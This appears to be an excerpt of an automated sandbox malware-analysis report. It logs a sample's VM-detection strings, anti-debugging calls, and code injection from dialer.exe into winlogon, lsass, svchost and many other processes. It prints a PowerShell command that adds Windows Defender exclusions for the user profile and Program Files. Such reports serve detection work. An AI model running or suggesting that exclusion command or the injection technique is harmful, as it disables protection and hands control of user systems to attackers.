Source: lsass.exe, 0000001B.00000000.2135862561.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: pvmicshutdownNT SERVICE
Source: dialer.exe, 00000034.00000002.3320602236.000001888CCB1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWv
Source: dwm.exe, 0000001F.00000000.2144668597.000001D156AA0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000gB
Source: lsass.exe, 0000001B.00000000.2135862561.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: pvmicvssNT SERVICE
Source: svchost.exe, 00000036.00000002.3332840295.00000200A2218000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: zSCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000_0r
Source: dialer.exe, 00000034.00000002.3320602236.000001888CCB1000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000034.00000002.3320602236.000001888CC58000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000033.00000002.3320150147.000001A1CA000000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
Source: lsass.exe, 0000001B.00000000.2135862561.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: pvmicheartbeatNT SERVICE
Source: dwm.exe, 0000001F.00000000.2144668597.000001D156B0A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: lsass.exe, 0000001B.00000002.3324532176.000002D6F0613000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001B.00000000.2135732569.000002D6F0613000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001E.00000000.2139714419.0000014E41C13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3321323009.0000014E41C13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000032.00000002.3321630822.0000023C9FE2B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000032.00000000.2169595526.0000023C9FE2B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2171295021.000001A1CA034000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000002.3320596627.000001A1CA034000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000036.00000002.3323235611.00000200A1241000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000036.00000000.2184612889.00000200A1241000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: lsass.exe, 0000001B.00000000.2136214678.000002D6F0CC0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V Administrators
Source: svchost.exe, 0000001E.00000002.3321323009.0000014E41C13000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000

Source: C:\Windows\System32\dialer.exe	API call chain: ExitProcess graph end node			graph_14-471
Source: C:\Windows\System32\dialer.exe	API call chain: ExitProcess graph end node			graph_42-474

Source: C:\Users\user\Desktop\hiwA7Blv7C.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\winlogon.exe

Code function: 23_2_000002D0165E7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

23_2_000002D0165E7D90

Source: C:\Windows\System32\dialer.exe

Code function: 14_2_00007FF68D3D2B38 GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,K32EnumProcesses,Sleep,

14_2_00007FF68D3D2B38

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Process token adjusted: Debug

Source: C:\Windows\System32\winlogon.exe	Code function: 23_2_000002D0165E7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	23_2_000002D0165E7D90
Source: C:\Windows\System32\winlogon.exe	Code function: 23_2_000002D0165F6218 SetUnhandledExceptionFilter,	23_2_000002D0165F6218
Source: C:\Windows\System32\winlogon.exe	Code function: 23_2_000002D0165ED2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	23_2_000002D0165ED2A4
Source: C:\Windows\System32\lsass.exe	Code function: 27_2_000002D6F1517D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	27_2_000002D6F1517D90
Source: C:\Windows\System32\lsass.exe	Code function: 27_2_000002D6F151D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	27_2_000002D6F151D2A4
Source: C:\Windows\System32\lsass.exe	Code function: 27_2_000002D6F1577D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	27_2_000002D6F1577D90
Source: C:\Windows\System32\lsass.exe	Code function: 27_2_000002D6F1586218 SetUnhandledExceptionFilter,	27_2_000002D6F1586218
Source: C:\Windows\System32\lsass.exe	Code function: 27_2_000002D6F157D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	27_2_000002D6F157D2A4
Source: C:\Windows\System32\svchost.exe	Code function: 30_2_0000014E41FDD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	30_2_0000014E41FDD2A4
Source: C:\Windows\System32\svchost.exe	Code function: 30_2_0000014E41FD7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	30_2_0000014E41FD7D90
Source: C:\Windows\System32\dwm.exe	Code function: 31_2_000001D15B096218 SetUnhandledExceptionFilter,	31_2_000001D15B096218
Source: C:\Windows\System32\dwm.exe	Code function: 31_2_000001D15B08D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	31_2_000001D15B08D2A4
Source: C:\Windows\System32\dwm.exe	Code function: 31_2_000001D15B087D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	31_2_000001D15B087D90
Source: C:\Windows\System32\svchost.exe	Code function: 46_2_0000023AF32ED2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	46_2_0000023AF32ED2A4
Source: C:\Windows\System32\svchost.exe	Code function: 46_2_0000023AF32E7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	46_2_0000023AF32E7D90
Source: C:\Windows\System32\dialer.exe	Code function: 47_2_00007FF75E941131 Sleep,Sleep,_amsg_exit,_initterm,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,_cexit,	47_2_00007FF75E941131
Source: C:\Windows\System32\dialer.exe	Code function: 47_2_00007FF75E94C1B8 SetUnhandledExceptionFilter,	47_2_00007FF75E94C1B8
Source: C:\Windows\System32\dialer.exe	Code function: 47_2_00007FF75E943EF9 SetUnhandledExceptionFilter,	47_2_00007FF75E943EF9
Source: C:\Windows\System32\svchost.exe	Code function: 50_2_0000023C9FD9D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	50_2_0000023C9FD9D2A4
Source: C:\Windows\System32\svchost.exe	Code function: 50_2_0000023C9FD97D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	50_2_0000023C9FD97D90
Source: C:\Windows\System32\svchost.exe	Code function: 51_2_000001A1CA717D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	51_2_000001A1CA717D90
Source: C:\Windows\System32\svchost.exe	Code function: 51_2_000001A1CA726218 SetUnhandledExceptionFilter,	51_2_000001A1CA726218
Source: C:\Windows\System32\svchost.exe	Code function: 51_2_000001A1CA71D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	51_2_000001A1CA71D2A4
Source: C:\Windows\System32\svchost.exe	Code function: 53_2_00000246EDE6D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	53_2_00000246EDE6D2A4
Source: C:\Windows\System32\svchost.exe	Code function: 53_2_00000246EDE76218 SetUnhandledExceptionFilter,	53_2_00000246EDE76218
Source: C:\Windows\System32\svchost.exe	Code function: 53_2_00000246EDE67D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	53_2_00000246EDE67D90
Source: C:\Windows\System32\svchost.exe	Code function: 54_2_00000200A19BD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	54_2_00000200A19BD2A4
Source: C:\Windows\System32\svchost.exe	Code function: 54_2_00000200A19B7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	54_2_00000200A19B7D90
Source: C:\Windows\System32\svchost.exe	Code function: 55_2_0000022596687D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	55_2_0000022596687D90
Source: C:\Windows\System32\svchost.exe	Code function: 55_2_000002259668D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	55_2_000002259668D2A4

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
Source: C:\Users\user\Desktop\hiwA7Blv7C.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force	Jump to behavior
Source: C:\Program Files\Google\Chrome\updater.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force	Jump to behavior

Allocates memory in foreign processes

Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\winlogon.exe base: 2D016580000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\lsass.exe base: 2D6F14E0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 14E41FA0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\dwm.exe base: 1D15B020000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\winlogon.exe base: 2D016610000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\lsass.exe base: 2D6F1540000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 14E428D0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\dwm.exe base: 1D15B050000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 23AF32B0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 23C9FD60000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1A1CA6E0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 246ED7B0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 200A1980000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 22595FB0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 22E670C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1FE4A4B0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 24C19A40000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 275D1FC0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 23BBDC90000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 227D8FC0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2DED2C70000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 14ACE6B0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 220AEFD0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 241B6940000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 202A22A0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 14D25AA0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1BD1A2F0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 21A63950000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1834ABA0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2D8F03D0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 18BAF3C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 256EBEB0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2568E1B0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 226A7DC0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\spoolsv.exe base: 1110000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1E2C0F50000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2EE0D7C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 22B68FC0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 207EA5A0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 1EBCE8A0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 11CD6340000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1AFDEB70000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 207C0460000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 245A2150000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 247087D0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 22F60740000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 26E569B0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2CA8FE60000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\sihost.exe base: 1D63DC30000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1A799B20000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1F6963C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 26481BB0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 166D2D90000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\ctfmon.exe base: 128DE440000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2101D0E0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\explorer.exe base: BC80000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 192D1E50000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 26DD2000000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 257155B0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\dasHost.exe base: 16443E50000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 2C8A6FC0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1E968280000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1A9452E0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\dllhost.exe base: 29227D20000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 283E5C00000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\smartscreen.exe base: 14BB07C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 22C4F660000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1DBAE870000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 27B1B9F0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 27FF3CD0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 281CF7C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 28843650000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 27140F10000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 1B9870D0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 22B325B0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1F05EDA0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 20CDE980000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1823E640000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\dllhost.exe base: 21A39370000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\dllhost.exe base: 1411DE90000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\wbem\WMIADAP.exe base: 254EE9C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\wbem\WMIADAP.exe base: 254EED70000 protect: page execute and read and write

Contains functionality to inject code into remote processes

Source: C:\Windows\System32\dialer.exe

Code function: 14_2_00007FF68D3D1C88 CreateProcessW,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,OpenProcess,TerminateProcess,

14_2_00007FF68D3D1C88

Creates a thread in another existing process (thread injection)

Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\winlogon.exe EIP: 1658273C	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\lsass.exe EIP: F14E273C	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 41FA273C	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 1661273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: F154273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 428D273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 5B05273C
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: F32B273C
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 9FD6273C
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: CA6E273C
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: ED7B273C
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: A198273C
Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 95FB273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 670C273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 4A4B273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 19A4273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: D1FC273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: BDC9273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: D8FC273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: D2C7273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: CE6B273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: AEFD273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: B694273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: A22A273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 25AA273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 1A2F273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 6395273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 4ABA273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: F03D273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: AF3C273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: EBEB273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 8E1B273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: A7DC273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 111273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: C0F5273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: D7C273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 68FC273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: EA5A273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: CE8A273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: D634273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: DEB7273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: C046273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: A215273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 87D273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 6074273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 569B273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 8FE6273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 3DC3273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 99B2273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 963C273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 81BB273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: D2D9273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: DE44273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 1D0E273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: BC8273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: D1E5273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: D200273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 155B273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 43E5273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: A6FC273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 6828273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 452E273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 27D2273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: E5C0273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: B07C273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 4F66273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: AE87273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 1B9F273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: F3CD273C
